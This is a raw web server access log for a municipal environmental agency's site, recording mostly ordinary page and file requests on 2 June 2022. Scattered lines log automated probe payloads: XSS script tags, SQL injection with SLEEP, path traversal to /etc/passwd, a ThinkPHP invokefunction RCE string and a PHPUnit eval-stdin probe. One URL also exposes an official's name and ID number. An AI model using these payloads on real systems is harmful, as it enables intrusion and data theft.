172.22.2.4 - - [02/Jun/2022:06:28:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
201.245.192.253 - - [02/Jun/2022:06:32:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46465
216.245.221.92 - - [02/Jun/2022:06:33:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:06:33:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44286
172.22.2.4 - - [02/Jun/2022:06:33:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.61.209.157 - - [02/Jun/2022:06:35:38 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
181.61.209.157 - - [02/Jun/2022:06:35:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 345752
172.22.2.4 - - [02/Jun/2022:06:34:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56364
181.61.209.157 - - [02/Jun/2022:06:36:50 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 371251
216.245.221.92 - - [02/Jun/2022:06:38:24 -0500] "HEAD / HTTP/1.1" 200 -
111.92.117.27 - - [02/Jun/2022:06:38:28 -0500] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 1019
172.22.2.4 - - [02/Jun/2022:06:39:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:40:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
157.55.39.127 - - [02/Jun/2022:06:42:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201550-1599.tif HTTP/1.1" 200 4511112
173.252.107.12 - - [02/Jun/2022:06:42:53 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
201.245.192.253 - - [02/Jun/2022:06:42:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46465
172.22.2.4 - - [02/Jun/2022:06:42:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [02/Jun/2022:06:42:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [02/Jun/2022:06:42:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [02/Jun/2022:06:43:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Jun/2022:06:43:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44286
46.101.1.185 - - [02/Jun/2022:06:44:48 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:49 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:49 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:49 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:49 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:50 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:50 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:50 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:50 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:50 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:51 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:51 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:51 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:51 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:51 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:52 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:52 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:52 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:52 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:52 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:53 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:53 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:53 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:54 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:54 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:54 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:55 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:55 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:55 -0500] "GET / HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:56 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:56 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:56 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:56 -0500] "GET / HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET / HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:57 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:58 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:58 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:58 -0500] "GET / HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:58 -0500] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:59 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 4720
46.101.1.185 - - [02/Jun/2022:06:44:59 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:59 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:44:59 -0500] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:45:00 -0500] "GET / HTTP/1.1" 200 319
46.101.1.185 - - [02/Jun/2022:06:45:00 -0500] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 319
172.22.2.4 - - [02/Jun/2022:06:45:45 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [02/Jun/2022:06:45:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:45:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
186.102.53.229 - - [02/Jun/2022:06:48:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [02/Jun/2022:06:48:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:49:15 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [02/Jun/2022:06:49:44 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 36811
172.22.2.4 - - [02/Jun/2022:06:49:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
172.22.2.4 - - [02/Jun/2022:06:51:18 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%202%20del%201%20de%20Septiembre%20de%202017.pdf HTTP/1.1" 200 152575
31.148.131.167 - - [02/Jun/2022:06:52:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0139.pdf HTTP/1.1" 200 793893
172.22.2.4 - - [02/Jun/2022:06:50:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:51:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58029
216.245.221.92 - - [02/Jun/2022:06:53:24 -0500] "HEAD / HTTP/1.1" 200 -
46.101.1.185 - - [02/Jun/2022:06:57:06 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:16 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:19 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:25 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:29 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
179.43.173.14 - - [02/Jun/2022:06:57:32 -0500] "GET /.hg HTTP/1.1" 404 1034
46.101.1.185 - - [02/Jun/2022:06:57:35 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:37 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:39 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
46.101.1.185 - - [02/Jun/2022:06:57:42 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
172.22.2.4 - - [02/Jun/2022:06:56:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [02/Jun/2022:06:58:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:06:57:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58482
157.55.39.127 - - [02/Jun/2022:07:02:14 -0500] "GET /Publicaciones/2022EE85832.pdf HTTP/1.1" 404 227
216.245.221.92 - - [02/Jun/2022:07:03:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:07:02:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.52.89 - - [02/Jun/2022:07:04:47 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.80.52.89 - - [02/Jun/2022:07:04:47 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.80.52.89 - - [02/Jun/2022:07:04:48 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.80.52.89 - - [02/Jun/2022:07:04:55 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
186.80.52.89 - - [02/Jun/2022:07:04:55 -0500] "GET /catalogoisis/imagenes/aceptar2.gif HTTP/1.1" 200 586
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/Js/Marcados.js HTTP/1.1" 200 1327
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/Css/Pft.css HTTP/1.1" 200 3933
186.80.52.89 - - [02/Jun/2022:07:04:56 -0500] "POST /catalogoisis/comb.php HTTP/1.1" 200 4469
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/fonest4.gif HTTP/1.1" 404 1396
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/back.gif HTTP/1.1" 200 666
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/up.gif HTTP/1.1" 200 669
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/selecc.gif HTTP/1.1" 200 784
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/correo.gif HTTP/1.1" 200 525
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/home.gif HTTP/1.1" 200 923
186.80.52.89 - - [02/Jun/2022:07:04:57 -0500] "GET /catalogoisis/imagenes/print.gif HTTP/1.1" 200 916
172.22.2.4 - - [02/Jun/2022:07:03:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60973
186.29.222.113 - - [02/Jun/2022:07:05:04 -0500] "GET /appsia/controlador?comando=ingresarMenuPrincipal&id=51741757&funcionario=LUZ+MARINA+ZULUAGA+TAPASCO&desde=51741757&hasta=51741757&version=51741757&accion=Regresar HTTP/1.1" 404 68
186.29.222.113 - - [02/Jun/2022:07:05:06 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [02/Jun/2022:07:06:21 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [02/Jun/2022:07:06:21 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [02/Jun/2022:07:06:22 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [02/Jun/2022:07:06:22 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [02/Jun/2022:07:06:22 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [02/Jun/2022:07:06:29 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [02/Jun/2022:07:06:40 -0500] "GET /BLA/boletinlegal/registro/index.php HTTP/1.1" 200 3151
172.22.2.4 - - [02/Jun/2022:07:06:40 -0500] "GET /BLA/boletinlegal/registro/assets/css/contact.css HTTP/1.1" 200 3025
172.22.2.4 - - [02/Jun/2022:07:06:40 -0500] "GET /BLA/boletinlegal/registro/captcha.php HTTP/1.1" 200 1702
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/contact/ajax-loader.gif HTTP/1.1" 200 673
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/css/lay.css HTTP/1.1" 200 588
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/lay/bg.jpg HTTP/1.1" 200 309
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/lay/top.jpg HTTP/1.1" 200 17190
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/contact/email.png HTTP/1.1" 200 641
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/lay/center.jpg HTTP/1.1" 200 480
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/contact/user_suit.png HTTP/1.1" 200 748
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1344
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/contact/send_button.png HTTP/1.1" 200 256
172.22.2.4 - - [02/Jun/2022:07:06:41 -0500] "GET /BLA/boletinlegal/registro/assets/img/lay/bot.jpg HTTP/1.1" 200 1641
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8292
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [02/Jun/2022:07:06:46 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [02/Jun/2022:07:06:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
172.22.2.4 - - [02/Jun/2022:07:07:33 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Resolucion&sector=competencia-estructura&ano=&resuelve=Resoluci%F3n%20SDA%200045%20de%202022 HTTP/1.1" 200 454
172.22.2.4 - - [02/Jun/2022:07:07:53 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Resolucion&sector=humedales&ano=&resuelve=Resoluci%F3n%20SDA%200045%20de%202022 HTTP/1.1" 200 454
172.22.2.4 - - [02/Jun/2022:07:07:58 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [02/Jun/2022:07:07:58 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [02/Jun/2022:07:07:59 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [02/Jun/2022:07:07:59 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [02/Jun/2022:07:07:59 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [02/Jun/2022:07:07:59 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
216.245.221.92 - - [02/Jun/2022:07:08:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [02/Jun/2022:07:08:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0045&usuario=&sector=COMPETENCIA&fecha=2022&resuelve=Resoluci%F3n%20SDA%200045%20de%202022%20 HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:08:55 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [02/Jun/2022:07:09:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0045&usuario=&sector=&fecha=2022&resuelve=Resoluci%F3n%20SDA%200045%20de%202022%20 HTTP/1.1" 200 626
172.22.2.4 - - [02/Jun/2022:07:08:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.61.209.157 - - [02/Jun/2022:07:10:28 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
181.61.209.157 - - [02/Jun/2022:07:10:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
172.22.2.4 - - [02/Jun/2022:07:09:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59075
186.80.52.89 - - [02/Jun/2022:07:11:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.61.209.157 - - [02/Jun/2022:07:11:17 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
181.61.209.157 - - [02/Jun/2022:07:11:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 240477
181.61.209.157 - - [02/Jun/2022:07:12:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 161572
172.22.2.4 - - [02/Jun/2022:07:12:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
